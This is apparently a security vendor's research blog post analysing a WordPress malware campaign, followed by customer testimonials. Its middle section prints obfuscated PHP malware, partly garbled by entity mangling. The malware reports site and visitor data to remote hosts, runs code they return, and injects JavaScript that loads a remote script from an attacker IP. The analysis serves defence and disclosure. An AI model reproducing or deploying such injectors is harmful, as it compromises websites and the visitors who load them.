Research Blog

New Malware – Eval + GetMama + Encoded Javascript

We are seeing many WordPress sites on shared hosts getting compromised with an encoded javascript malware. It has multiple levels of obfuscation and that’s how it starts:


1- ALL PHP files with an eval (base64_decode line of code:

/*god_mode_on*/eval (base64_decode("ZXZhbC

2- That long piece of code, once executed gets decoded to:

if (!function_exists(GetMama)){function opanki
($buf){$god_mode = $_SERVER["good"];
olower($buf),$cnt_h); str_replace("<?xml&qu
 if (($cnt_h > 2)&&($cnt_x =
= 0)) {$buf = $god_mode .&nb
sp;$buf;} return $buf; } function&nb
sp;GetMama(){$mother = "www.psite&
#46net";return $mother;}ob_start("opanki&
quot;);$show = false;function ahfudflfzdh
fhs($pa){global $show; global $god_mode;&
nbsp;$mama = GetMama();$file = urlen
code(__FILE__);if (isset($_SERVER["HTTP_HOST&q
uot;])){$host = $_SERVER["HTTP_HOST"
];}if (isset($_SERVER["REMOTE_ADDR"])){$i
p = $_SERVER["REMOTE_ADDR"];}if&nbsp
;(isset($_SERVER["HTTP_REFERER"])){$ref =
nbsp;= urlencode(strtolower($_SERVER["HTTP_USE
R_AGENT"]));}$url = "http://"&n
bsp;. $pa . "/opp.php?mothe
r=" .$mama . "&file=&quot
; . $file . "&host="
 . $host . "&ip="&nb
sp;. $ip . "&ref=" &
#46 $ref . "&ua=" .$
ua;if( function_exists("curl_init") 
){$ch = curl_init($url);curl_setopt($ch, 
CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CU
RLOPT_TIMEOUT, 3);$ult = curl_exec($ch);}
 else {$ult = @file_get_contents($ur
l);} if (strpos($ult,"eval") !=
= false){$z = str_replace("eval&quot
;,"",$ult); eval($z); $show =&n
bsp;true; return true;} if (strpos($
ult,"ebna") !== false){$z =&nbs
$god_mode = $z; $show = true;&n
bsp;return true; $_SERVER["good"]&nb
sp;= $god_mode; } else {return 
false;}}$father[] = "146둩뒮
6245";$father[] = "31둨뒢&
#46103";$father[] = "91둴ል
6둄";$father[] = "91둴.
216ሩ";foreach($father as $ur){if&nbs
p;( ahfudflfzdhfhs($ur) ) { break&nb
sp;;}}if ($show === false){$script=’<s
cript>var _0x8ab7=["x31x34x36x2Ex31x3
x6Cx64"];var _0xa341=[_0x8ab7[0],_0x8ab7[1],
_0x8ab7[2],_0x8ab7[3]];for(var i in _0xa3
41){var js=document[_0x8ab7[5]](_0x8ab7[4]);js[_0x8
ab7[6]]=_0x8ab7[7]+_0xa341[i]+_0x8ab7[8];var head=d
);} ;</script>’;  $god_mode =&
nbsp;$script;} $_SERVER["good"] =&nb
sp;$god_mode; }

3- Which adds the following to the browser of anyone visiting the compromised site:

<script>var _0x8ab7=["146.185.25
quot;,"appendChild"];var _0xa341=[_0x8ab7
[0],_0x8ab7[1],_0x8ab7[2],_0x8ab7[3]];for(var i&nbs
p;in _0xa341){var js=document[_0x8ab7[5]](_0x8
var head=document[_0x8ab7[10]](_0x8ab7[9])[0];head[
_0x8ab7[11]](js);} ;</script>

And that code (once executed by the browser) is used to generate a remote javascript include to load malware from 146.185.25 4.245,, and


Very nasty piece of code and we are seeing hundreds (if not thousands) of sites with it.


If your site is compromised, sign up with us and we will fix it for you:



    • Sucuri helps me sleep at night knowing that our websites and user data is secure. Over the years, Sucuri has helped us detect and prevent major hack attempts. I recommend Sucuri to all of my clients and users because they offer the most comprehensive and cost effective WordPress security solution. I've done my industry research, and there's no one better than these guys.

      —Syed Balkhi, Founder, WPBeginner


    • Let's be honest: the web can be a scary place sometimes. Having done many a WordPress malware cleanup in my day, I've found Sucuri to do a better job than I ever hoped I could do. Not only are they thorough, but they're fast as heck and affordable to boot. You don't just walk into a bad situation without some protection. Sucuri *is* that protection.

      —Andrew Norcross, Founder & Lead Developer @Reaktiv Studios, WordCamp Speaker

      Reaktiv Studios

    • We partnered with Sucuri for our WordPress migration and dehacking services as their capabilities are significantly more comprehensive than anything we’ve seen in the industry.

      —Brian Clark, CEO of Coppyblogger Media


    • I like to think I know security, but there is only one company I trust when it comes to the security of my websites, that company is Sucuri. They are, in my opinion, hands-down the leader in web-malware protection and cleanup services. Trust the experts, hire these fools!

      —Brad Williams, Co-Founder WebDevStudios, Co-Author Professional WordPress Series


    • When you’re talking about protection for your WordPress site and the things most important to you — your content — you want to trust the experts. There’s really no better choice than the team at Sucuri.

      —Cory J. Miller – Founder / CEO of


    • Before Sucuri we didn’t know that someone was hacked until they told us. (Or actually, when Google blocked their site!) Now we find and fix problems before they even know what’s happening. It’s a Godsend, it’s as simple as possible, and it’s so affordable that quite frankly it’s irresponsible to not use them!

      —Jason Cohen, CEO of WP Engine

      WP Engine

    • As the owner of, a shared web hosting company, we are always fighting malware and spam. Recently we partnered with Sucuri and now all our accounts are monitored. I love this product! It not only protects our customers from malware, but these guys will fix a hack in 4 hours.

      —Carel Bekker, Owner/President of


    • Sucuri is my go to service for web based security and are the group that I recommend, exclusively, to my clients and readers, in particular WordPress users.  They are affordable, they work fast and they get the job done – as a bonus, they’re a fun group to work with!

      —Lisa Sabin-Wilson – Author: WordPress For Dummies; Designer, Co-Founder Allure Themes, Founder E. Webscapes

      E. Webscapes

    • Though I believe my sites are secure, it would be inexcusable for me not to use Sucuri’s service and be absolutely sure around the clock.

      —Scott Kingsley Clark, Lead Developer, Pods Framework


Scan your website FOR FREE